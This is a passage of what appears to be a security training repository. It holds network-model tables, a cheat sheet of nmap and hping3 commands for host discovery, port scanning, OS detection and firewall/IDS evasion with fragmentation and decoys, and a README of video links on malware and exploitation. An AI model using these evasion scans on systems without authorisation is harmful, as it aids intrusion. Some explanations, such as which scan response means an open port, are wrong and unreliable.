_____________________________________________ 21 | | Client | Direction | Server | 22 | |:-------------:|:-------------:|:---------:| 23 | | SYN | ----> | | 24 | | | <---- | SYN+ACK | 25 | | ACK | ----> | | 26 | 27 | 28 | ## OSI Model 29 | _________________________________________________________________________________________________________ 30 | | Layer || Name || Description || Example protocols | 31 | |:-----:||:------------------:||:----------------------------------------------:||:--------------------:| 32 | | 7 || Application layer || Human Computer Interaction Layer. || HTTP, SNMP | 33 | | 6 || Presentation layer || Ensure Data Usability Format || MIME, ASCII | 34 | | 5 || Session layer || Maintain Con. and control Ports and Session || SOCKS, NetBIOS | 35 | | 4 || Transport layer || Data Transmission by TCP or UDP || TCP, UDP | 36 | | 3 || Network layer || Decide Physical Path for Transmission || IP, ICMP | 37 | | 2 || Data link layer || Read MAC Address from data packet || MAC, ARP | 38 | | 1 || Physical layer || Physical connection || Ethernet, Wi-Fi | 39 | 40 | ## TCP/IP Model 41 | __________________________________________________ 42 | | Layer | Name | Example protocols | 43 | |:-----:|:------------------:|:-----------------:| 44 | | 4 | Application layer | HTTP, SNMP | 45 | | 3 | Transport layer | TCP, UDP | 46 | | 2 | Internet layer | IP, ICMP | 47 | | 1 | Link layer | ARP, MAC | 48 | --------------------------------------------------------------------------------------------------------------- 49 | # Practical Part 50 | ------------------ 51 | ## Main Objectives 52 | k1. Scan live host 53 | k2. Open Ports and Running Services 54 | k3. OS and Architecture info 55 | k4. Security Implemented (Firewall, IDS, IPS) Detection and evasion 56 | 57 | ## k1. Live hosts 58 | arp-scan --local 59 | nmap -sn / -sn specify NO-Port Ping Scan 60 | ping 61 | netdiscover -r / 62 | -------------------------------------------------------------------------- 63 | ## Nmap Port Scan Status 64 | Open - If No response is received by Nmap, it means Port is Open for connection. 65 | Closed - If response is received by nmap with RST or SYN flag, it means ports are closed. 66 | Filtered - May be some kind of firewall is implemented on client side. 67 | Open/Filtered - Nmap is confused, either port is open or filtered. 68 | Closed/Filtered - Nmap is confused, either port is closed or filtered 69 | -------------------------------------------------------------------------- 70 | ## k2. Open Ports and Running Services Scan 71 | Nmap 72 | nmap Simple Port Scan 73 | nmap -v Port Scan with increase verbosity. (-vv is more powerful) 74 | nmap Scan Multiple host in single go 75 | nmap <1.1.1.2-200> Scan IP Range from 2 to 200 76 | nmap /cidr Scan Entire Subnet 77 | nmap -p 1-65535 -p specify Port Numbers to scan. 78 | nmap -p U:,T: Scan specified TCP and UDP ports. use "" for all. 79 | nmap -sU Scan 1000 Common UDP Ports 80 | nmap -T<0-5> -T specify intensity of scan to time taken by scan. 5 is fastest and 0 is slowest. Default Speed is 3(-T3). 81 | nmap -sT TCP Connect Scan 82 | nmap -iL list.txt Scan ip written in list.txt file (Separate IP by Space, Tab or New Line). --exclude file list.txt (to exclude ip from search) 83 | nmap -A Aggressive Scan (it use -O -sC --traceroute -sV) options 84 | nmap -O -O is used for OS Detection 85 | nmap -sC -sC is used to run Default NSE Scripts --- --script 86 | nmap -sV -sv is used for Service Version Detection 87 | nmap -6 IPv6 Scan 88 | nmap -sS Sync Scan/Ping. Helpful in case where ICMP pings are blocked. 89 | nmap -sA ACK Scan/Ping. Helpful in case where ICMP pings are blocked. Null Scan 90 | nmap --scanflags SYNACKFIN We can set flags using --scanflags option. 91 | nmap -Pn Don't Ping Scan (When Firewall block Ping Packets) 92 | nmap -sR Scan for RPC (Remote Procedure Call) Service 93 | Hping3 94 | hping3 --icmp --verbose Ping Scan in Verbose 95 | hping3 --scan Scan for Open Ports on IP (--ack, --syn, --fin, --urg) 96 | hping3 --udp --verbose UDP port Scan in Verbose 97 | 98 | -------------------------------------------------------------------------- 99 | ## k3. Security Implemented (Firewall, IDS, IPS) Detection and evasion 100 | nmap -f -f will fragment packets in 8-byte packets. Helpful when attempting to evade some older or improperly configured firewall or we can specify packet fragment size using --mtu " option. Size should be multiple of 8 101 | nmap -D RND: -D Decoy option is used to mask an Nmap scan by using one or more decoys. Decoy is used to hide identity. RND is Number of Decoy Address to be used. We can also specify Addresses by our own. as nmap -D decoy1,decoy2,decoy3,etc 102 | nmap -sX Nmap XMas Scan (if Firewall is enable you get (all thousand ports are closed/filtered), if Firewall is disable you get (Closed). Xmas Scan use PSH+URG+FIN flag or All flag for packets and create abnormal situation for client for which client either respond with RST Flag or some relevant info. 103 | -------------------------------------------------------------------------- 104 | ## We can also use Zenmap 105 | -------------------------------------------------------------------------- 106 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![YouTube Playlist](https://img.shields.io/badge/YouTube-Playlist-red?logo=youtube)](https://www.youtube.com/playlist?list=PL--2vyReuUpTTg9cpFheJXJ2ySFfaHduq) 2 | 3 | --> Playlist content will keep on updating and it contains or will contain topics related to 4 | 1. Cryptography --> Done 5 | 2. Lab Setup + Network and OS Fundamentals --> Done 6 | 3. System Security --> Basics Done --> Higher level topics will be added with Labs 7 | 4. Network Security --> To Be Released 8 | 5. Web Application Security --> To Be Released 9 | 6. Android Application Security --> To Be Released 10 | 7. Cloud Fundamentals --> To Be Released 11 | 8. Cloud Security --> To Be Released 12 | 13 |
14 | 📺 Fundamentals 15 | 16 | | **Understanding CIA Triad (Confidentiality, Integrity, Availability)** | **Common Security Standards** | 17 | |----------------------------------|-----------------------------------------------| 18 | | [!Understanding CIA Triad (Confidentiality, Integrity, Availability)](https://img.youtube.com/vi/J-c3SydXA4A/hqdefault.jpg)](https://youtu.be/J-c3SydXA4A?si=_NCr9wewAgnTi11V) | [![Common Security Standards](https://img.youtube.com/vi/yIdjDN9L1go/hqdefault.jpg)](https://youtu.be/yIdjDN9L1go?si=qzIFc8jzcX-KTiuw) | 19 | 20 | | **Different Teams** | **Types of Testing** | 21 | |------------------------------------------------------------------------|---------------------------------------------| 22 | | [![Different Teams](https://img.youtube.com/vi/H513r646VOQ/hqdefault.jpg)](https://youtu.be/H513r646VOQ?si=73jkk-UZMRFDiHmm) | [![Types of Testing](https://img.youtube.com/vi/IEi6zvTKHdU/hqdefault.jpg)](https://youtu.be/IEi6zvTKHdU?si=dsn3GECvRXIrrk4T) | 23 | 24 | | **Five Phase of Hacking** | **Common Terms** | 25 | |----------------------------------|---------------------------------------| 26 | | [![Five Phase of Hacking](https://img.youtube.com/vi/BoRytkpn4_8/hqdefault.jpg)](https://youtu.be/BoRytkpn4_8?si=GPoNI_byflIQk4L7) | [![Common Terms](https://img.youtube.com/vi/VmBym5XxC-Q/hqdefault.jpg)](https://youtu.be/VmBym5XxC-Q?si=9SdMKg0xrdCwaKZT) | 27 | 28 |
29 | 30 | 31 |
32 | 📺 Cryptography 33 | 34 | | 🎥 **Encoding - Decoding** | 🎥 **Encrypption - Decryption** | 35 | |---------------|---------------| 36 | | [![Encoding - Decoding](https://img.youtube.com/vi/U6C5O7JZ9YA/hqdefault.jpg)](https://youtu.be/U6C5O7JZ9YA?si=qZ6to3ugyxW05UWT) | [![Encrypption - Decryption](https://img.youtube.com/vi/7xqy_do8kIs/hqdefault.jpg)](https://youtu.be/7xqy_do8kIs?si=TBeTAJVsVoDTM6yA) | 37 | 38 | | 🎥 **Video 3** | 🎥 **Digital Signatures and Certificates** | 39 | |---------------|---------------| 40 | | [![Hashing](https://img.youtube.com/vi/oAoPLtwB9Tg/hqdefault.jpg)](https://youtu.be/oAoPLtwB9Tg?si=nlmh2qCN322DvSuA) | [![Digital Signatures and Certificates](https://img.youtube.com/vi/mMVGSSO1-d0/hqdefault.jpg)](https://youtu.be/mMVGSSO1-d0?si=lKYEEDUnVR-d24W5) | 41 | 42 |
43 | 44 | 45 |
46 | 📺 Lab Setup + Network and OS Fundamentals 47 | 48 | | **Windows Installation in VMWare Pro** | **Kali Linux Installation in VMWare Pro** | 49 | |------------------------------------------|---------------------------------------------| 50 | | [![Windows Installation in VMWare Pro](https://img.youtube.com/vi/QowgD_y3mD0/hqdefault.jpg)](https://youtu.be/QowgD_y3mD0?si=y4qd-9O3yAIRwBda) | [![Kali Linux Installation in VMWare Pro](https://img.youtube.com/vi/5rENNOB3FpI/hqdefault.jpg)](https://youtu.be/5rENNOB3FpI?si=Sj3dYYeMVhyLp8Fi) | 51 | 52 | | **Linux Introduction Part 1** | **Linux Introduction Part 2** | 53 | |--------------------------------|----------------------------------| 54 | | [![Linux Introduction Part 1](https://img.youtube.com/vi/5P3UU3nhJxc/hqdefault.jpg)](https://youtu.be/5P3UU3nhJxc?si=aE164vrMTTcBEole) | [![Linux Introduction Part 2](https://img.youtube.com/vi/dhrdgoysSgI/hqdefault.jpg)](https://youtu.be/dhrdgoysSgI?si=WDIV-lujQ9CnbkkR) | 55 | 56 | | **Introduction to Network and Topology** | **Intra Network Packet Transmission** | 57 | |--------------------------------|------------------------------------------| 58 | | [![Introduction to Network and Topology](https://img.youtube.com/vi/csh2IR8Iklc/hqdefault.jpg)](https://youtu.be/csh2IR8Iklc?si=UqI3i-upowFIgyKk) | [![Intra Network Packet Transmission](https://img.youtube.com/vi/OzuvqUnsbrs/hqdefault.jpg)](https://youtu.be/OzuvqUnsbrs?si=HluUIi7v2C0BZMB2) | 59 | 60 | | **Inter Network Packet Transmission** | **IP Address Structure and there Classification** | 61 | |-------------------------------------------|-------------------------------| 62 | | [![Inter Network Packet Transmission](https://img.youtube.com/vi/dOQnmfCyCFE/hqdefault.jpg)](https://youtu.be/dOQnmfCyCFE?si=f3H9DewLA3TdJwck) | [![IP Address Structure and there Classification](https://img.youtube.com/vi/dBVA9EKBro8/hqdefault.jpg)](https://youtu.be/dBVA9EKBro8?si=ZyrcvyNwywG3uzfr) | 63 | 64 | | **Public and Private IP Allocation** | **Subnatting & Supernatting** | 65 | |--------------------------------------------|--------------------------------------------| 66 | | [![Public and Private IP Allocation](https://img.youtube.com/vi/J7YJ34cy91c/hqdefault.jpg)](https://youtu.be/J7YJ34cy91c?si=-ZL2ALCta0ogv6sk) | [![Subnatting & Supernatting](https://img.youtube.com/vi/0o1w36LkDUg/hqdefault.jpg)](https://youtu.be/0o1w36LkDUg?si=Nb2uFJ-FKNJiBilt) | 67 | 68 |
69 | 70 | 71 |
72 | 📺 Basic Malware and System Exploitation Techniques 73 | 74 | | **Windows Lock Screen Bypass** | **Malware Part 1** | 75 | |--------------------------------|------------------------------| 76 | | [![Windows Lock Screen Bypass](https://img.youtube.com/vi/f-yPOVM5OFM/hqdefault.jpg)](https://youtu.be/f-yPOVM5OFM?si=ZbGYJ-yJa6vTbgLP) | [![Malware Part 1](https://img.youtube.com/vi/xf5mxbltx1Y/hqdefault.jpg)](https://youtu.be/xf5mxbltx1Y?si=Lj9uuTTuxBTpdu5i) | 77 | 78 | | **Malware Part 2** | **Malware Part 3** | 79 | |-----------------------------|-----------------------------| 80 | | [![Malware Part 2](https://img.youtube.com/vi/kGUBXYpPhy4/hqdefault.jpg)](https://youtu.be/kGUBXYpPhy4?si=1SFMti3mKdWG93bo) | [![Malware Part 3](https://img.youtube.com/vi/ykD4t00Y_Uw/hqdefault.jpg)](https://youtu.be/ykD4t00Y_Uw?si=WuQEuDqZR9gIvD49) | 81 | 82 | | **Malware Part 4** | **Network Connection and Traffic** | 83 | |-----------------------------|------------------------------------| 84 | | [![Malware Part 4](https://img.youtube.com/vi/qCK8QmbQ3F4/hqdefault.jpg)](https://youtu.be/qCK8QmbQ3F4?si=PnKUF57QjSa3a16M) | [![Network Connection and Traffic](https://img.youtube.com/vi/8cxAw2ZrGtE/hqdefault.jpg)](https://youtu.be/8cxAw2ZrGtE?si=z43F7ANfXoIhhbKR) | 85 | 86 | | **Memory Stack Introduction Part 1** | **Memory Stack Introduction Part 2** | 87 | |-------------------------------------|-------------------------------------| 88 | | [![Memory Stack Introduction Part 1](https://img.youtube.com/vi/fQWatTI9G4E/hqdefault.jpg)](https://youtu.be/fQWatTI9G4E?si=bCc7ynYva2KFM1Qv) | [![Memory Stack Introduction Part 2](https://img.youtube.com/vi/uSd2dtzGN5s/hqdefault.jpg)](https://youtu.be/uSd2dtzGN5s?si=E7BVgymfVb06A7sy) | 89 | 90 | | **Memory Corruption and Buffer Overflow** | **Eternal Blue or MS-17-010 or CVE-2017-0144** | 91 | |------------------------------------------|------------------------------------------------| 92 | | [![Memory Corruption and Buffer Overflow](https://img.youtube.com/vi/LNqpE_6DfBU/hqdefault.jpg)](https://youtu.be/LNqpE_6DfBU?si=PYgbzLXx3gZ5rtp9) | [![Eternal Blue or MS-17-010 or CVE-2017-0144](https://img.youtube.com/vi/1A23SXBWDqs/hqdefault.jpg)](https://youtu.be/1A23SXBWDqs?si=qSoY2SwZUQcSTc2x) | 93 | 94 |
95 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | theme: jekyll-theme-hacker --------------------------------------------------------------------------------